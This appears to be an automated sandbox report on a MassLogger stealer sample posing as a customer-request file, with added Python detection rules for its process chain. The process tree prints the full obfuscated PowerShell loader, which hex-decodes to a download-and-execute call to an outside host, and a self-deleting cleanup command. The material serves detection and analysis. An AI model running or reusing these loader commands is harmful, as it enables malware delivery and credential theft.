Analysis

  • max time kernel
    152s
  • max time network
    132s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    31-07-2020 10:56

General

  • Target

    Clasquin France SA - Demande client 001071 - SKBMT-07-31-2020-105-img00215.exe

  • Size

    19KB

  • MD5

    36117a183609bb6953d3f78bb45ee5b9

  • SHA1

    0d89d56bac5838a3f0854e43b42e564d290f4935

  • SHA256

    3a58855a902398680563edf448779739201772e044102fe1c733f54fa9c936c1

  • SHA512

    79ff888d369979be614821bc2f74d99aec8b24887edaea4c2b43cffe60942b87311e082bf031bf3111b70578c4814aa43eb01e09d314c776a013fc3c5df8f5c2

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\42EF15E83D\Log.txt

Family

masslogger

Log (contents of Log.txt; the report template labels this field "Ransom Note", but MassLogger is a stealer and this is its collection log, not a ransom note)

<|| v2.1.0.0 ||>
User Name: Admin
IP: 154.61.71.13
Location: United States
Windows OS: Microsoft Windows 7 Professional 64bit
Windows Serial Key: HYF8J-CVRMY-CM74G-RPHKF-PW487
CPU: Persocon Processor 2.5+
GPU: Standard VGA Graphics Adapter
AV: NA
Screen Resolution: 1280x720
Current Time: 7/31/2020 12:58:24 PM
MassLogger Started: 7/31/2020 12:58:18 PM
Interval: 96 hour
MassLogger Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
MassLogger Melt: true
MassLogger Exit after delivery: false
As Administrator: True
Processes:
<|| WD Exclusion ||> Disabled
<|| Binder ||> Disabled
<|| Downloader ||> Disabled
<|| USB Spread ||> Disabled
<|| Bot Killer ||> Disabled
<|| Window Searcher ||> Disabled
<|| Search And Upload ||> Disabled
<|| Telegram Desktop ||> Not Installed
<|| Pidgin ||> Not Installed
<|| FileZilla ||> Not Installed
<|| Discord Tokken ||> Not Installed
<|| NordVPN ||> Not Installed
<|| Outlook ||> Not Installed
<|| FoxMail ||> Not Installed
<|| Thunderbird ||> Not Installed
<|| FireFox ||> Not Found
<|| QQ Browser ||> Not Installed
<|| Chromium Recovery ||> Not Installed or Not Found
<|| Keylogger And Clipboard ||> Disabled

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of AdjustPrivilegeToken 43 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Suspicious use of SetThreadContext 1 IoCs
  • MassLogger log file 1 IoCs

    Detects a log file produced by MassLogger.

  • Drops file in System32 directory 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • MassLogger

    Masslogger is a .NET stealer targeting passwords from browsers, email and cryptocurrency clients.
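The signatures above flag the individual building blocks (AdjustPrivilegeToken, SetThreadContext and WriteProcessMemory on the PowerShell process, an InstallUtil.exe child, a file drop in a system directory) but not the chain as a whole. The Python below is an added example, not part of the sandbox report or of MassLogger: it runs three process-lineage rules over constructed process-creation events that mirror this report's process tree (same images, PIDs and command lines; the caret-hex blob in the PowerShell command line is abbreviated). The rules are: PowerShell launched with ExecutionPolicy Bypass, a long caret-separated hex blob and a backtick-broken IEX; InstallUtil.exe started by PowerShell with no assembly argument, which is the hollowing target here (the extracted log names it as the MassLogger process, and the 616KB image dumped from PID 1220 is the injected payload); and cmd.exe starting a detached PowerShell that sleeps and then deletes a binary under \Windows\, which is the log's "Melt: true" turned against the hollowed host image. The event schema (pid, ppid, image, cmdline) is an assumed generic one; map it to Sysmon Event ID 1 or your EDR's process-create fields.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """Assumed generic process-create record (Sysmon EID 1 / EDR equivalent)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed events mirroring the process tree in this report. The caret-hex
# blob in PID 752's command line is abbreviated to its first tokens.
DROPPER = r"C:\Users\Admin\AppData\Local\Temp\Clasquin France SA - Demande client 001071 - SKBMT-07-31-2020-105-img00215.exe"
EVENTS = [
    ProcEvent(1108, 0, DROPPER, '"%s"' % DROPPER),
    ProcEvent(752, 1108, r"C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe",
              r"Powershell -ExecutionPolicy Bypass $TRTTz='24^54^62^6F^6E^65^3D^27^2A^45^58^27^2E^72^65^70^6C^61^63^65^28...';"
              r"$jm=$TRTTz.Split('^') | forEach {[char]([convert]::toint16($_,16))};$jm -join ''|I`E`X"),
    ProcEvent(1220, 752, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
              r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"'),
    ProcEvent(1976, 1220, r"C:\Windows\SysWOW64\cmd.exe",
              r'''"cmd" /c start /b powershell Start-Sleep -Seconds 2; Remove-Item -path 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe' & exit'''),
    ProcEvent(1204, 1976, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell Start-Sleep -Seconds 2; Remove-Item -path 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe'"),
]

# Eight or more "XX^" tokens in a row is already far longer than any legitimate caret escape.
CARET_HEX = re.compile(r"(?:[0-9A-Fa-f]{2}\^){8,}")
# Matches iex, i`e`x (backtick-broken) and the full cmdlet name.
IEX_CALL = re.compile(r"\bi`?e`?x\b|invoke-expression", re.I)


def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()


def args_after_image(cmdline):
    """Return whatever follows the (possibly quoted) program token on a Windows command line."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[end + 1:].strip() if end != -1 else ""
    parts = s.split(None, 1)
    return parts[1].strip() if len(parts) > 1 else ""


def r_powershell_caret_hex_iex(ev, parent):
    # Stage 1 of this sample: Bypass policy, caret-hex blob, Invoke-Expression of the result.
    return (image_name(ev.image) == "powershell.exe"
            and "-executionpolicy bypass" in ev.cmdline.lower()
            and CARET_HEX.search(ev.cmdline) is not None
            and IEX_CALL.search(ev.cmdline) is not None)


def r_installutil_without_assembly(ev, parent):
    # InstallUtil.exe is only ever launched legitimately with an assembly path.
    # An argument-less launch from PowerShell is the hollowing host seen in this tree.
    return (image_name(ev.image) == "installutil.exe"
            and args_after_image(ev.cmdline) == ""
            and parent is not None and image_name(parent.image) == "powershell.exe")


def r_detached_self_delete(ev, parent):
    # "Melt": cmd.exe detaches (start /b) a PowerShell that sleeps, then deletes a binary under \Windows\.
    cl = ev.cmdline.lower()
    return (image_name(ev.image) == "cmd.exe"
            and "start /b" in cl and "powershell" in cl
            and "remove-item" in cl and "\\windows\\" in cl)


RULES = [r_powershell_caret_hex_iex, r_installutil_without_assembly, r_detached_self_delete]


def run_rules(events):
    """Evaluate every rule against every event; returns (pid, rule name) hits in event order."""
    by_pid = {e.pid: e for e in events}
    return [(ev.pid, rule.__name__) for ev in events for rule in RULES
            if rule(ev, by_pid.get(ev.ppid))]


def lineage(events, pid):
    """Image names from the root ancestor down to pid, for reporting the whole chain."""
    by_pid = {e.pid: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(image_name(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain[::-1]


if __name__ == "__main__":
    for pid, rule in run_rules(EVENTS):
        print(pid, rule, " -> ".join(lineage(EVENTS, pid)))
```

Each rule fires on a different PID (752, 1220, 1976), so even one hit gives an analyst the chain via lineage(); the self-delete rule is the most durable of the three because it does not depend on the obfuscation scheme of the first stage.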

Processes

  • C:\Users\Admin\AppData\Local\Temp\Clasquin France SA - Demande client 001071 - SKBMT-07-31-2020-105-img00215.exe
    "C:\Users\Admin\AppData\Local\Temp\Clasquin France SA - Demande client 001071 - SKBMT-07-31-2020-105-img00215.exe"
    1⤵
      PID:1108
    • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
      Powershell -ExecutionPolicy Bypass $TRTTz='24^54^62^6F^6E^65^3D^27^2A^45^58^27^2E^72^65^70^6C^61^63^65^28^27^2A^27^2C^27^49^27^29^3B^73^61^6C^20^4D^20^24^54^62^6F^6E^65^3B^64^6F^20^7B^24^70^69^6E^67^20^3D^20^74^65^73^74^2D^63^6F^6E^6E^65^63^74^69^6F^6E^20^2D^63^6F^6D^70^20^67^6F^6F^67^6C^65^2E^63^6F^6D^20^2D^63^6F^75^6E^74^20^31^20^2D^51^75^69^65^74^7D^20^75^6E^74^69^6C^20^28^24^70^69^6E^67^29^3B^24^70^32^32^20^3D^20^5B^45^6E^75^6D^5D^3A^3A^54^6F^4F^62^6A^65^63^74^28^5B^53^79^73^74^65^6D^2E^4E^65^74^2E^53^65^63^75^72^69^74^79^50^72^6F^74^6F^63^6F^6C^54^79^70^65^5D^2C^20^33^30^37^32^29^3B^5B^53^79^73^74^65^6D^2E^4E^65^74^2E^53^65^72^76^69^63^65^50^6F^69^6E^74^4D^61^6E^61^67^65^72^5D^3A^3A^53^65^63^75^72^69^74^79^50^72^6F^74^6F^63^6F^6C^20^3D^20^24^70^32^32^3B^24^6D^76^3D^27^28^4E^27^2B^27^65^77^27^2B^27^2D^4F^27^2B^27^62^27^2B^27^6A^65^27^2B^27^63^27^2B^27^74^20^27^2B^20^27^4E^65^27^2B^27^74^2E^27^2B^27^57^27^2B^27^65^62^27^2B^27^43^27^2B^27^6C^69^27^2B^27^65^6E^74^29^27^2B^27^2E^44^27^2B^27^6F^77^27^2B^27^6E^6C^27^2B^27^6F^61^27^2B^27^64^27^2B^27^53^27^2B^27^74^72^27^2B^27^69^6E^67^28^27^27^68^74^74^70^3A^2F^2F^6D^65^72^72^69^6D^61^63^6B^2E^69^65^2F^45^30^2E^6A^70^67^27^27^29^27^7C^49^60^45^60^58^3B^24^61^73^63^69^69^43^68^61^72^73^3D^20^24^6D^76^20^2D^73^70^6C^69^74^20^27^2D^27^20^7C^46^6F^72^45^61^63^68^2D^4F^62^6A^65^63^74^20^7B^5B^63^68^61^72^5D^5B^62^79^74^65^5D^22^30^78^24^5F^22^7D^3B^24^61^73^63^69^69^53^74^72^69^6E^67^3D^20^24^61^73^63^69^69^43^68^61^72^73^20^2D^6A^6F^69^6E^20^27^27^7C^4D';$jm=$TRTTz.Split('^') | forEach {[char]([convert]::toint16($_,16))};$jm -join ''|I`E`X
      1⤵
      • Process spawned unexpected child process
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      • Blacklisted process makes network request
      • Suspicious use of WriteProcessMemory
      • Suspicious use of SetThreadContext
      • Drops file in System32 directory
      PID:752
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:1220
        • C:\Windows\SysWOW64\cmd.exe
          "cmd" /c start /b powershell Start-Sleep -Seconds 2; Remove-Item -path 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe' & exit
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1976
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell Start-Sleep -Seconds 2; Remove-Item -path 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe'
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious behavior: EnumeratesProcesses
            • Drops file in System32 directory
            PID:1204

    Network

    MITRE ATT&CK Matrix (ATT&CK v6)

    Tactic             Technique                 Count  ID
    Credential Access  Credentials in Files      1      T1081
    Collection         Data from Local System    1      T1005

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    • memory/1204-8-0x0000000000000000-mapping.dmp
    • memory/1204-9-0x0000000000000000-mapping.dmp
    • memory/1220-3-0x0000000000400000-0x000000000049A000-memory.dmp
      Filesize

      616KB

    • memory/1220-4-0x000000000049424E-mapping.dmp
    • memory/1220-5-0x0000000000400000-0x000000000049A000-memory.dmp
      Filesize

      616KB

    • memory/1220-6-0x0000000000400000-0x000000000049A000-memory.dmp
      Filesize

      616KB

    • memory/1976-7-0x0000000000000000-mapping.dmp